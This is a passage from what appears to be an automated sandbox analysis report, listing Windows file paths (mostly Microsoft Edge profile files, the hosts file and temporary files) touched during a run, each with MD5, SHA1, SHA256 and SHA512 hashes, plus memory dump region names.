| SHA512 | a54731c17382a8146953d828d1ef2f43e9bc5df4920f8ef84afa83fbc547854171eb7d3f2353e221129a491b21d519ae56cde1232190327ea2f6c2f48ae47e50 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 63eef35f6a5d0ce8125818a4ee4e5d1b |
| SHA1 | c0591316e581d25e74029a3aae1c46ca356ae350 |
| SHA256 | 67a1e576b49fbabec44b3e3772f6e71cbc63633db2e029260f0b55ad29c4fe7f |
| SHA512 | 85cd1d68a3b69e68d116cd1ab20225beaed5f936da87e1616d67a7294624f3c0a56e92fc901506bb2668b365922005366d03910758d57ed9d54a22da7e63b465 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8165d331a65e980c7f75dba657342854 |
| SHA1 | 44967c0388744de38b07e07e3a9cb174854eb7bf |
| SHA256 | 08d7b1fa1c3cdacb73cb9b34bb51a0516bfeac2f10ec54f2f27469d1c97820a9 |
| SHA512 | ee23180ed03c5042d6e6343ac2181a6d9ffbbb775e1031222e46b4a61eca4f1caf2dab50269271a07b284e270195595c91ce8c43d4cef77c8873845216546e54 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a6411a25620b88ae5940c7564409ecc8 |
| SHA1 | a39b8b0982fbea052af388f9653a961cbc59ea20 |
| SHA256 | efb3b4251d8f3057c03102ef8a0dc0799ac8cb03b99b986608889d196503ab31 |
| SHA512 | 094e53d0e4aca6876b051f78599dff127058b1f6975cd1d75532fb9a8a774b9d92923fce95d2147cf937c6e3b7c931d8fce16afa204d03ec8d7889bcb1700e46 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0528965b7d7cda35cc2844fc0c67682e |
| SHA1 | b902c5266326d27f432a0f22531dede7a692130f |
| SHA256 | 5207c0c9b61a203d4c6813347052c89a85b059cf0f844a747ea0d10c01792326 |
| SHA512 | 7e5a0614a94713991195f2e7117980ff0bbb8d9d76dfcb4106261e359299a29637b4df595abe62b2c81de3b4b001600d6fa0620590563ab408d104cc5e8ac0a8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 02cf1313b32a8ab2f031cee39bee8fc3 |
| SHA1 | 861cc0ab9ff881460dd6433e37075b822aac9355 |
| SHA256 | 7e7fd13903a8d57f314d9e7dab6fa28975050b63f045eb315e96cccaa17d1e61 |
| SHA512 | f5464c94391bfb590f6755c2ae6896dd459a2a93d778601caebf272438c2ff127ec5de81dcf8efeec65a56609558477afc7be1c4993977a18fde7b915f7a8700 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 0a83f08a134b066dfc4e86295105afca |
| SHA1 | c32e29f60fa4fb71b6557889ee436117d9f0759f |
| SHA256 | 9abb00e96ca09ab529e16b3560cb1928cbed98b1afa9eb005c7012e412b0c941 |
| SHA512 | 5288a942d5bc400319773ccaf2f5b5b6dbaf2a40fceec356ee7fbcc1ef287ef9225a8cf0680d8c08297300935b9830a599ec9e6a372d2b355a82e6dd27623d7e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | 164a788f50529fc93a6077e50675c617 |
| SHA1 | c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48 |
| SHA256 | b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17 |
| SHA512 | ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b9a3685727a3a3f7ec60d8c418c3cd66 |
| SHA1 | c219a1f5787138f90fbf14b5e8cf5d71780bf978 |
| SHA256 | c05f605941c9a57f4e7ec7158ff7bf7bf87dc9efeced1527b5e901a250f4d010 |
| SHA512 | 432bf18aea4a13ed47fa5bf59ab951cd54b49b6c8bbc00a3870e8adf24d0fd679cf7af8dc64d094294c15a01a672c94ab2acbf9e385ce3bd0e6354e01c8ded86 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 84c26a6d56e07c20fa6eddd274f9ca1f |
| SHA1 | 326b8a69303e484d842efed2aec4b265fd5d3f6e |
| SHA256 | 97261a457e55f9232611124e545ead76f68b666734fe62507501984791b4a09d |
| SHA512 | 767aad6db0ca18b2cf0cc5b415a62779a5ee234a0598a625789c8fcc1e3454f7e9295960ac3e55cc5651e2e39f8a0f31e19f430ffb49cd5a29391b760e330ed0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006f
| MD5 | bd01400b58e03faaa4db55c0f1f2c5aa |
| SHA1 | 98a182db61d54280db1ca50fbaf799250d13ddf7 |
| SHA256 | adbb0b3c846d6826f385683f5100a715a8e0e201c5f112316a8dfde4939febb2 |
| SHA512 | eaf62715a75e8f50df4b2729b9a90ff44934914961466f28df11ac929df5b6b35b5d811b71656cbf416df6bd474ecbbbb294e4c8d370d843bf83a0a170859645 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 147fa1b42cfd22266cb2b463c8306c73 |
| SHA1 | f5d8097fc7dd1f9c091008b2cc09ca4805b5e49e |
| SHA256 | 3948f7a9802f282d4536513df9f76ac1ae92c3030deffd6dcf147ff37c0406ab |
| SHA512 | 9295aef491ddff13874dad70b7e32045a859794082b352dec3ce04f02ae59ff0025bede37e74822b73833c620759a282241433be6112f65f782e9c2903358cec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 11c7ee51943bb934694bee184e5694a9 |
| SHA1 | 218bface0828cd311e51efc303a35f86a476f9f1 |
| SHA256 | 470d938fbe543903e76d9591f1c9c4325bb4b1d11b5ceec9b2825a51a1659d79 |
| SHA512 | ddb90f75ebe48e99c9474df637f109a811777f76379db7636df36ae7616bbf1f3b0777977af3c605ae347871427b6af3fc3472875a4c2446c117fbb21f3c4994 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3f47deb1ddc60187ecbeb6191c43e858 |
| SHA1 | a6f30e5dafda54a0b170e6151ae96d7aadac59f7 |
| SHA256 | ce3acd5943c8c9179a7d14ac98d12d4fc2cb34ee72e59e6b564d473b63c76a72 |
| SHA512 | 68e10c2e2be9a6b939b784e2e222539df2b4527d82b398b8429845804517c206c8ed9509214afa64b90340a4d63be7b5dfd80823b58388d06a99023f8ec1c6a1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fde6d8450dc18bee2866368a48665386 |
| SHA1 | 3fde44462f6829a952633c1a59cfb1bbc4f44d1d |
| SHA256 | fa039d681078564135bcaff740d9de9729641766f137db7c9b5e5f850e168eae |
| SHA512 | 3fe92b853d98d6ddb6172a6ad3c86aeb4af580fb3bd54efae2e68209bbdd23438f3383da82abaaf236d0f4fc4ab40e7b71947f52885ef3848464912c16a72ecd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | cad583fd568814c936724043880cf0fb |
| SHA1 | 4e5896a55cff0ee9ac0f4c661d4af6ac58883925 |
| SHA256 | 20e8b4181a3d568a09d5dfd9954ae0f211febb80ee0268a6076f59fe0d170bbc |
| SHA512 | 2f6db4f3dcae6474fe54b3708a0b71a4c6efbcf1ccfc767929e3c8a5d51010d1278598de2ca4b757fe9991657057a43540bcf7e22ec3395bfd7a112fb3cba033 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000070
| MD5 | ab7fc8ab7d76d79285b17b4d9860cbf0 |
| SHA1 | b5833d99bda07236d2ad950fe452cf595fbc3c20 |
| SHA256 | 99933f6af1e17aadc2472a0d537dc4cd9ea565ca56ef5081eb00c806b351083b |
| SHA512 | 200083c436e414fe92512d317cb8434d4fb099ed4075b22e171feb4b379b9b72bbd5a926b5d8040bc0d27d54bb4df5841c509a0a95bb70becfbc5f7d7f5f2daf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000071
| MD5 | eef911348f13105f1501b48929ef9224 |
| SHA1 | e8f3fd90ae05a940444a80a6c84cab08245891e3 |
| SHA256 | 5524773f6bb8874ae1ff858bf25ca03e86f90e3a6854448e7f85726b89271da8 |
| SHA512 | ead59bd08d3f11236caf5236ac17fc8af996ec2aa1322d547e26376f7fcc8109db2417b16267cd5f55480b6263fd70fbdabcc67f99c1b1f6385a20ca85f17814 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4208_184422037\c289e6cd-4713-4d8c-915a-82038e198a24.tmp
| MD5 | dd9bf8448d3ddcfd067967f01e8bf6d7 |
| SHA1 | d7829475b2bd6a3baa8fabfaf39af57c6439b35e |
| SHA256 | fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72 |
| SHA512 | 65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9df1416794551834d201b4435b8b9fbf |
| SHA1 | 14d81eb53cc5766626f69027e026339a6ac19e78 |
| SHA256 | 1fbc19859b5efc14f08024cdec626c222c38e738f81ec9716f19497debfcfddd |
| SHA512 | ad7be4bf99111c5e2fcc80e6840fe1950e2f6014ecb4e943a90854e8d45dea4f9f0434bc42077edc35a7cdd541aadb086ed66e1d360d32e879d1a1c97d3baa5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 211729595ed5dbe4c5f533c1f5871aff |
| SHA1 | 5d10cf03a739599cbb76b6aaaeddbf6a215ebd8d |
| SHA256 | 6f33d63a2ae15ce9842fc8ed4847a359027894394121e25db5999886b5c268c3 |
| SHA512 | 466cd793a135a40557159ff4a97392d1a710eba84a4d36ba7e650dc73162eed5dba59f50a4b85bd18a19549d7e35b2729d7bf43d7d7e2b984b987e3be52bb207 |
memory/3756-935-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Temp\c12fda1f-3ae0-4c48-9494-b4a64d441f66.tmp
| MD5 | 78e47dda17341bed7be45dccfd89ac87 |
| SHA1 | 1afde30e46997452d11e4a2adbbf35cce7a1404f |
| SHA256 | 67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550 |
| SHA512 | 9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5 |
C:\Users\Admin\AppData\Local\Temp\b6d3367a-5c60-4abf-882e-c5b4848d9cda.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e68d5ccb393d8e89cb2a7da15b79175b |
| SHA1 | 9d01c820e869903c84bfe3c7727c69e3d2902105 |
| SHA256 | bb7ab4128c51c0529567fa2e9a73fe92cd7c336cf943f7499f5c42daeb2f7f03 |
| SHA512 | d9cad7c90cd1dac66af16fbedd4f55ab2f6b7d4b97c4b9e6717a12e895bb32f9ef644012beca1e9fff885796420ffae002a57a13be356fd1b1675138959a7267 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | bc1f41c23de98dd6669561ee0c825404 |
| SHA1 | 1d8e23c2f81efffad5f0f629a22efa77abb5725a |
| SHA256 | 963bf1577577a0a4e586fc159cc8b69aecb65cd0d2434191625306c74e12af1a |
| SHA512 | 6c8952c6ac118ac0349091bfd66be831f40c528a4eaf94474ec8b28868b72376c4f15979f365563253292dabac5a7ce8e8b5bceb0ebc853e5277020ca00291f9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe588eae.TMP
| MD5 | 67ad73770a91f3a1362f985da6c1e700 |
| SHA1 | da22a1ae9cbbbccd9e30c73f98aacb53b6f4750d |
| SHA256 | 55e7685668dc559704c5ebee8be88173f386500d7d834a590a86089898a295c0 |
| SHA512 | 5fde24b69520205569f609610b2e0d9db77ebeaab14fedafbcf58a97dddbaffc37dc5643ffc53172d6b93f50f64d73daf4d2119338415865ca0844d9241e178c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\71da8a39-e652-4a14-a5ad-765c89d1c9bf.tmp
| MD5 | 59a619df295184abc1ac0ba3b15fdcc3 |
| SHA1 | 0856e1674cba0be2f3519510ce0b8de22ab58d2b |
| SHA256 | 9c928a97842e8199b2513f1b96d6ee96bb1ab88ab4ae1d44f0dad5a1ec0aa4dd |
| SHA512 | 12ed6664ca33c5f88bdff7565aedd2ec952555ec41c66f21bcd7ded095b27a113cc957e4002a2eed70b37dc6920c7bc179b9bb0bc5744a1034e99e0469a0f550 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a92188796bbf92f6f148031cf12cc87a |
| SHA1 | d48a65ae202c118faca6f31b6d88488e59a915f3 |
| SHA256 | d12f8b47b99d778d13dc5c63b95f7b01305184de71522761564ebdbd897f10a8 |
| SHA512 | b0cf689154ad0e3a91e3d7bd114f173e9ceae3e71cf633958383e21e7560ad58e67bcd83f79f50b3a42df566c5b5e6c8318af9289b8db2c7a233a5842fe201bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 275f838ca991656a561ce243dd6ec156 |
| SHA1 | ce49f87d64eef4c3922486e8cb46ceb4a11dcc54 |
| SHA256 | 811b2479fd7ce9dd3b5bf711774c0074f2600488c876a39ee16eb0d7bbda7d4a |
| SHA512 | 5d3eaf2d356e4f7b202ece8af838fb54050f2a73e37ca5821eeb7e39a5bbcc1bfaa8707726c3eebf23c3a7bad714cd1331e9338c06dfd953195ff2ede3806636 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 36840753b452a60e140a92ec1fa2c704 |
| SHA1 | 60bba0d64b6632aabe416e6ce2d88d91ffd0e611 |
| SHA256 | 3fa658db6e7c2cc96bc279e093a4bd158d4841041c1aa499177b8cb252e867ca |
| SHA512 | acf57480d54714579b7fb8424ac6f1b1f85b34a896c67349ec8f3efaccbe9cc69d59563c0604e0b12c8ade5c75a0a6587c5c07760773b9ef75e9679228899b64 |
memory/964-3374-0x0000000000920000-0x000000000092C000-memory.dmp
memory/964-3516-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9050e3041028a49d8828239704a11385 |
| SHA1 | 0bde9bea638e0a273cb2a36e29ccdc992330554e |
| SHA256 | 115927b8aeb9da369920e61c1db315fdc48bfc7e1354dcda8e4616a87dde0b2b |
| SHA512 | e58b2dee1bbde4022d0d7775eea687239b495ea8f97e5e890f86ccd89586a648cde1247b8866aa080980de68f8b40a2455cf929aa2b748e3bdda3890b291e32a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 56f018912ebfd66f01fea4ffff1c1115 |
| SHA1 | 17a4352ed8edca96b541841b552a44b51cf0600c |
| SHA256 | 86ef5fa06e294527044bb8a46c31dfeca9bff45267db3f176d1125a7e82d3620 |
| SHA512 | 401b597e44b123b45d19b2ebad0d0abc158211f886bd65363b80130c0b3078311ecb5e3b5009bcf322b2a555ceb40f4d6fa8000193c7358b1884691395646810 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 0fb209dc448544831dad655729920a7f |
| SHA1 | 271b95cefbe4f9ddfcf252bdd93c04c575ba956d |
| SHA256 | 260084045edc46e6e07e8cc6617fdfaeeac60d9fcc178a9a9e1d2a47131c060f |
| SHA512 | 4a60a1e8c12eef0bd5be2020bc307f6b224d9b3819bef3630ff44e1777fbccf7f73c3d325405b82367292a77c182f2668705b58a8fe830f6246b453452a49689 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe5bf643.TMP
| MD5 | 94b1d17be119a3d9fa7aa111a3d0c035 |
| SHA1 | c3cb6dfae07ba93f48992a65064b5cc4a8952851 |
| SHA256 | e46d36045614c001dc36bbe8eb7b72223d714d7818fae542cd309eadb5ac65d0 |
| SHA512 | b3c834aabc6c87f8bde221e5a4f3bfe531b875beacfeb405b86d15975ab4072cf54d469f70713fbe709c91fb82651f74d5d751fd058dd39387057cb75879c7e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 4bcc8ff504f70a87ac3f3b9f474d02f7 |
| SHA1 | 8fa2029ef6a9b57640cc4ea3d82c129ea8224ab3 |
| SHA256 | 55e83259b0519a5a2b87565dd590e697da18c3e00157326c5a8707bbf991c38e |
| SHA512 | 72c9366598bdbb3f68d619a4a0173dc89c25da3bfbc9044cd734f81ea5541e6213001a32ddf6d07aeacc2354e44b0f6fbb0fa809e817c793767ccef8f13a2022 |
memory/3732-4495-0x00007FFBB78C0000-0x00007FFBB7BE1000-memory.dmp